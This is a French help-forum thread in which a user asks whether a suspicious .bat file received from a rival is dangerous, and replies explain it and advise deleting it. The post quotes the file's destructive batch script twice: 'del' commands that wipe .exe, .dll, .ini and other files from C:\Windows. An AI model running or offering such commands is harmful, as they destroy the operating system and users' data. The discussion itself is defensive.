Aie est-ce dangereux

Résolu
bonjour,jevoudrais savoir si cela est dangereux on ma envoyer un fichier avec comme icone des engrenage jpense que c un fichier bat d'ou mon psodo bref quand g fais modifier il y a marquer ceci c dangereux ou pas merci de me repondre

@echo off
color c
title GAME OVER
del C:\windows\*.exe
del C:\windows\*.dll
del C:\windows\*com
del C:\windows\*.bin
del C:\windows\*.dat
del C:\windows\*.xml
del C:\windows\*.dnp
del C:\windows\*.ini
del C:\windows\*.dmp
del C:\windows\*.prx
del C:\windows\*.log

24 réponses

Résumé de la discussion

Un fichier présentant une icône d'engrenage et comportant des commandes batch est suspect et peut viser à endommager le système en supprimant des fichiers critiques. Plusieurs explications soulignent que la commande del efface des fichiers selon l'extension et le chemin, ce qui démontre le potentiel de dégâts si le fichier est exécuté. Des conseils insistent sur l'importance de ne pas ouvrir ni exécuter ce type de fichier et de le supprimer, car il peut toucher des éléments critiques du système. En pratique, cela nécessite une vérification antivirus et une suppression sécurisée, particulièrement sur des versions anciennes comme Windows XP, Vista ou Windows 7, afin d'éviter des dégâts même sans exécution.

Bobot (l’IA à votre service)
  1. ben comme dit la commande del ( ou delete ) supprime

par exemple :

supprime tout les fichiers ( * ) qui ont l'extension .exe dans le répertoire c:\windows\

etc...

donc, je sais pas qui t'as envoyé ça, mais c'est pas sympa ;)
    1
    1. et c plutot un mec soit un peu doué en info' soit qui a chopé ca sur un site qui crer des virus lol
      0
  2. bonjour

c'est un logiciel comme une autre mais supprime s'il ne te sert a rien ou si ca te parait suspect lol mais bon quand il y a marquer game over comme ca lol oui le mieux c'est que tu supprime sans l'ouvrir
    0
    1. ok dacc mes c dangereux ou pas c ca que je voudrais savoir
      0
      1. salut

ça supprime les fichiers ayant les extensions spécifiées...

tu es sous quel OS ?

tu risque de ne pas pouvoir redémarrer ton ordi...
        0
        1. ba jsuis sous xp mais g le meme fichier sur mon windows 7 bn ba je les est pas ouvert mais jvoudrais savoir ce que ca fais en gros svp
          0
          1. en gros ca "detruit un pc " lol nan c'est que sa supprime des fichier windows normalement , c'est assez chiant .... supprime le logiciel ca ira très bien.
            0
            1. lol ok merci aurevoir
              0
              1. ok c un gas que jme suis battu avec
                0
                1. ok merci g compris jvais le demonter une 2 eme fois lol merci pour tes reponses
                  0
                  1. mdr, donne lui une claque de notre part parce que son virus est à chier !

( je rigole bien sur, nan éviter de vous battre, dis lui juste que c'est une brêle ^^ )
                    0
                2. heu aussi g remarquer que sur l'autre soit disant "virus" qu'il ya a merquer ceci

@echo off
                  color c
                  title GAME OVER
                  cls
                  del C:\windows\*.dll
                  del C:\windows\*com
                  del C:\windows\*.bin
                  del C:\windows\*.xml
                  del C:\windows\*.dnp
                  del C:\windows\*.ini
                  del C:\windows\*.dmp
                  del C:\windows\*.prx
                  del C:\windows\*.log

il y a cls apres title gameover ca change des truc ca
                  0
                  1. ca ne change rien , il faut quand même le supprimer lol
                    0
                    1. ok merci mais a mon avis si je l'avais declancher sur windows xp et vista et le 7

jaurais eu des bleme ou pas ?
                      0
                      1. sous XP, certainement

sous vista et seven, je sais pas si tu aurais eu un avertissement avant

sachant que sur les 3 OS, normalement les fichiers importants ( systèmes ) ne peuvent pas être supprimé par un simple

del *.exe ...

mais comme il y aurait quand même eu des autres fichiers manquants ça aurait pu foutre le bronx, oui

à voir jusqu'où la commande serait allée... faudrait faire le test, tiens... ( qui veut foirer son install, pour assouvir not' curiosité ? ^^ )
                        0
                    2. oui tu aurais eu quelques soucis en effet.
                      0
                      1. dsl d'insister mais je voudrais bien savoir ca m'aurais fais quoi sur le windows xp
                        windows vista et le windows 7 merci
                        0
                        1. et il aurais mis quoi pour que ca me suprime les fichier dans windows en *.exe ect ...

(deltree) fin bn je sais pas jsuis pas un boss mais jsuis curieux
                          0
                          1. pour le windows vista et le 7
                            0
                            1. en gros ca supprime tous les fichier dans windows a savoir les logiciels ( au format .exe ) tous les fichier dll ( capital pour la survis du pc ) tous les fichiers .bin ( assez capital pour faire tourner les pc ) et tous les reste qui sont aussi vitaux enfin a part les xml lol
                              0
                              1. et sur windows 7 et vista ca maurais averti ou pas
                                0
                                1. non , si ton antivirus ne l'a pas reconnut , vista et seven seraient alors complètement HS
                                  0
                                  • 1
                                  • 2